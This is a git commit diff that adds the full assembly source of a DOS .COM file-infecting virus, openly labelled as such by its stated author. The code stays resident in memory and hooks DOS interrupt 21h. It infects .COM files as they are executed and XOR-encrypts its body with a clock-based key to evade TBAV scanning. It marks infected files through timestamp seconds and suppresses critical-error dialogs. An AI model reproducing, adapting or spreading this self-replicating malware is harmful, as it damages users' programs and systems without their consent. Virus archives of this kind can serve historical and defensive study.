Add files via upload

2026-06-16 07:49:24 +00:00 · 2021-01-12 17:52:14 -06:00
parent 14e07ba726
commit f76af55eb4
99 changed files with 49478 additions and 0 deletions
@@ -0,0 +1,386 @@
+;******************************************************************************
+;******************************************************************************
+;****		   Virus: .COM /noTBAV					   ****
+;****					 By: Ramthes Jones		   ****
+;******************************************************************************
+;******************************************************************************
+CODE	SEGMENT
+
+	ASSUME	CS:CODE, DS:CODE, ES:CODE, SS:CODE
+	ORG	0100h
+
+DELTA	EQU	(TWO - ONE)
+
+START:
+	JMP	VIR_START
+	NOP
+	MOV	AH,09h
+	MOV	DX,OFFSET MSG
+	PUSH	CS
+	POP	DS
+	INT	21h
+
+	INT	20h
+
+MSG	DB 0Ah,0Dh,'Virus Mr-X activado!!!',0Ah,0Dh
+	DB 'Por favor no ejecute ningun archivo. Je, je, je...',0Ah,0Dh,'$'
+
+VIR_START:
+ONE	LABEL	BYTE
+	MOV	BX,015Dh
+	PUSH	BX
+	MOV	SI,(OFFSET BEGIN - OFFSET ONE) - 1; Conocido
+	ADD	SI,BX
+	MOV	CX,(OFFSET TWO - OFFSET BEGIN) + 1; Conocido
+	MOV	DX,0FFCDh			  ; FFCD = INT FFh
+	CLI
+BUCLE:
+	MOV	AH,[SI]
+	XOR	AH,00h
+	DB	06 DUP (90h)
+	MOV	[bx+30],DX
+
+INTFFh	LABEL	WORD
+	MOV	[SI],AH
+	MOV	[bx+30],2488h
+	INC	SI
+	LOOP	BUCLE
+
+	STI
+	JMP	ATBV
+
+JODER:
+	MOV	AH,4Ch
+	INT	21h
+
+ATBV:
+	MOV	AH,30h
+	INT	21h
+
+BEGIN:
+	MOV	AX,0ACACh
+	INT	21h
+	CMP	AX,0CACAh
+	JE	RUN_COM
+	JMP	STAY_IN_MEMO
+
+RUN_COM:
+	PUSH	CS
+	PUSH	CS
+	POP	DS
+	POP	ES
+	POP	BX
+	MOV	DI,100h
+	LEA	SI,[(NORMAL - OFFSET ONE) + BX]
+	MOVSW
+	MOVSB
+	PUSH	CS
+	PUSH	0100h
+	RETF
+
+STAY_IN_MEMO:
+	MOV	AH,4Ah
+	XOR	BX,BX
+	INT	21h
+
+	MOV	AH,4Ah
+	MOV	BX,0FFFFh
+	INT	21h
+
+	SUB	BX,61h	;101h
+	MOV	AH,4Ah
+	INT	21h
+
+	MOV	AH,48h
+	MOV	BX,60h ;100h
+	INT	21h
+
+	MOV	ES,AX
+	PUSH	ES
+	DEC	AX
+	MOV	ES,AX
+	MOV	ES:WORD PTR [0001h], 0008h
+	POP	ES
+
+	PUSH	CS
+	POP	DS
+
+	POP	SI
+	PUSH	SI
+	XOR	DI,DI
+	MOV	CX,DELTA
+	CLD
+	REP	MOVSB
+
+	PUSH	ES
+	POP	DS
+
+	MOV	AX,3521h
+	INT	21h
+	POP	SI
+	PUSH	SI
+	MOV	DS:[INT21IP - OFFSET ONE],BX
+	MOV	DS:[INT21CS - OFFSET ONE],ES
+
+	MOV	AX,2521h
+	MOV	DX,(OFFSET HOOK_21 - OFFSET ONE)
+	INT	21h
+	JMP	RUN_COM
+
+HOOK_21 PROC FAR
+	PUSH	DS
+	PUSHF
+	PUSH	AX
+	PUSH	BX
+	PUSH	CX
+	PUSH	DX
+	PUSH	SI
+	PUSH	DI
+	PUSH	DS
+	PUSH	ES
+
+	CMP	AX,4B00h
+	JE	INFECT_COM
+	CMP	AX,0ACACh
+	JE	GIVE_MARK
+	JMP	FIN
+
+GIVE_MARK:
+	POP	ES
+	POP	DS
+	POP	DI
+	POP	SI
+	POP	DX
+	POP	CX
+	POP	BX
+	POP	AX
+	POPF
+	POP	DS
+	MOV	AX,0CACAh
+	IRET
+
+INFECT_COM:
+	PUSH	AX
+	PUSH	BX
+	PUSH	DX
+	PUSH	DS
+	PUSH	ES
+
+	MOV	AX, CS
+	MOV	DS, AX
+	MOV	AX,3524h
+	PUSHF
+	CALL	DWORD PTR DS:[INT21IP - OFFSET ONE]
+	MOV	DS:[INT24IP - OFFSET ONE],BX
+	MOV	DS:[INT24CS - OFFSET ONE],ES
+
+	MOV	AX,2524h
+	MOV	DX,(OFFSET HOOK_24 - OFFSET ONE)
+	PUSHF
+	CALL	DWORD PTR DS:[INT21IP - OFFSET ONE]
+	POP	ES
+	POP	DS
+	POP	DX
+	POP	BX
+	POP	AX
+
+	PUSH	DX
+
+	MOV	AX,4300h
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	MOV	CS:[(ATRIBUTOS - OFFSET ONE)],CX
+
+	MOV	AX,4301h
+	MOV	CX,20h
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	JC	FINAL_1
+
+	MOV	AX,3D02h
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	PUSH	AX
+	POP	BX
+
+	MOV	AH,3Fh
+	MOV	CX,2
+	PUSH	CS
+	POP	DS
+	MOV	DX,(OFFSET NORMAL - OFFSET ONE)
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	XOR	SI,SI
+	mov	ax,cs:(normal - offset one)[si]
+	cmp	ax,'ZM'
+	je	final_1
+	jmp	conti
+
+FINAL_1:
+	JMP	FINAL
+
+CONTI:
+	MOV	AX,5700h
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	MOV	CS:[(HORA - OFFSET ONE)],CX
+	MOV	CS:[(FECHA - OFFSET ONE)],DX
+
+	AND	CL,00011111b	; Esto es lo correcto para comprobar
+	CMP	CL,00001101b	;  si los segundos son 26
+	JE	FINAL_1
+
+	XOR	AL,AL
+	CALL	F_42h
+
+	MOV	AH,3Fh
+	MOV	CX,3
+	PUSH	CS
+	POP	DS
+	MOV	DX,(OFFSET NORMAL - OFFSET ONE)
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	MOV	AL,02h
+	CALL	F_42h
+	PUSH	AX
+
+	SUB	AX,3
+
+	MOV	SI,1
+	MOV	CS:(BUFFER - OFFSET ONE)[SI],AL
+	INC	SI
+	MOV	CS:(BUFFER - OFFSET ONE)[SI],AH
+
+	PUSH	BX
+	MOV	AH,48h
+	MOV	BX,150h
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	MOV	ES,AX
+	POP	BX
+
+	PUSH	CS
+	POP	DS
+
+	XOR	SI,SI
+	MOV	DI,SI
+	MOV	CX,OFFSET TWO - OFFSET ONE
+	CLD
+	REP	MOVSB
+
+	PUSH	ES
+	POP	DS
+
+	POP	AX			; Calculo
+	INC	AH			; la direccion
+	XOR	SI,SI			; donde va a
+	MOV	[SI + 1],AL		; comenzar el
+	MOV	[SI + 2],AH		; arch infectado
+
+	MOV	AH,2Ch
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	MOV	[SI+20],DL
+
+	MOV	CX,(OFFSET TWO - OFFSET BEGIN) + 1
+	MOV	SI,(OFFSET BEGIN - OFFSET ONE) - 1
+ENCRIPTO:
+	XOR	ES:[SI],DL
+	INC	SI
+	LOOP	ENCRIPTO
+
+	MOV	AH,40h
+	MOV	CX,DELTA
+	XOR	DX,DX
+	PUSH	ES
+	POP	DS
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	JC	FINAL
+
+	MOV	AH,49h
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	XOR	AL,AL
+	CALL	F_42h
+
+	MOV	AH,40h
+	MOV	CX,3
+	MOV	DX,(OFFSET BUFFER - OFFSET ONE)
+	PUSH	CS
+	POP	DS
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	MOV	AX,5701h
+	MOV	CX,CS:[(HORA - OFFSET ONE)]
+	AND	CL,11100000b
+	OR	CL,00001101b
+	MOV	DX,CS:[(FECHA - OFFSET ONE)]
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+FINAL:
+	MOV	AH,3Eh
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	MOV	AX,4301h
+	MOV	CX,CS:[(ATRIBUTOS - OFFSET ONE)]
+	POP	DX
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	MOV	AX,2524h
+	MOV	DX,CS:[INT24IP - OFFSET ONE]
+	MOV	DS,CS:[INT24CS - OFFSET ONE]
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP-OFFSET ONE]
+
+FIN:
+	POP	ES
+	POP	DS
+	POP	DI
+	POP	SI
+	POP	DX
+	POP	CX
+	POP	BX
+	POP	AX
+
+	POPF
+	POP	DS
+	JMP	DWORD PTR CS:[(INT21IP - OFFSET ONE)]
+
+F_42h	PROC
+	MOV	AH,42h
+	CWD
+	MOV	CX,DX
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	RET
+F_42h	ENDP
+
+HOOK_21 ENDP
+
+HOOK_24 PROC
+	XOR	AL,AL
+	IRET
+HOOK_24 ENDP
+
+INT21IP 	DW 0
+INT21CS 	DW 0
+INT24IP 	DW 0
+INT24CS 	DW 0
+INT17IP 	DW 0
+INT17CS 	DW 0
+ATRIBUTOS	DW 0
+HORA		DW 0
+FECHA		DW 0
+BUFFER		DB 3 DUP(0E9h)
+NORMAL		DB 3 DUP(90h)
+HIDDEN_MSG	DB "Ramthes. World Cup'98: ARGENTINA!!"
+TWO	LABEL	BYTE
+CODE	ENDS
+        END     START